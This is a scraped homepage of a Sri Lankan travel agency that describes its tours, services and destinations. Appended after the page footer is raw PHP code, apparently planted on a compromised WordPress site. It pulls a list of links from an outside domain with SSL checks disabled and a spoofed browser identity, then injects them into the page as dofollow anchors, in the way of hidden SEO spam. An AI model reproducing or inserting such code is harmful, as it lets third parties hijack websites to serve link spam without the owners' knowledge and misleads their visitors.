Home 3

4e26d332-53b5-4f8f-85dc-19944130d0bf

Your Trusted Guide to Sri Lanka

At GoLankaHolidays, we specialize in creating memorable travel experiences across the beautiful island of Sri Lanka. As a locally owned and operated travel company, we offer a deep understanding of the country’s culture, heritage, and hidden gems—ensuring every journey is unique and unforgettable.

Whether you’re looking for relaxing beach holidays, thrilling adventures, wildlife safaris, cultural tours, or honeymoon escapes, our team is here to craft the perfect itinerary just for you. From airport pickup to your final day, we take care of every detail with professionalism, passion, and care.

We believe that every traveler deserves a personalized experience that reflects their interests, pace, and travel style. With our local expertise and commitment to excellence, we make sure your time in Sri Lanka is smooth, enriching, and filled with unforgettable memories.

The Journey That Defines Us

Transportation

We prioritize your comfort and convenience, ensuring that every aspect of your travel is tailored to meet your needs

Assistance

Our dedicated team is committed to addressing inquiries promptly and effectively, providing personalized assistance tailored to each traveler's unique needs.

Accommodation

Savour carefully chosen lodgings that blend comfort, excellence, and the spirit of the area.

Budget-friendly Solutions

We make your ideal vacation cheap by providing outstanding experiences at rates that offer genuine value.

Packages

Book Your Ultimate Vacation

Luxury Hideaways

Destinations

Unveil Ceylon's Wonders

Kandy
Sigiriya
Ella
Adam’s-Peak
Mirissa
Bentota
Hatton
Galle

What Our Clients Say

Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }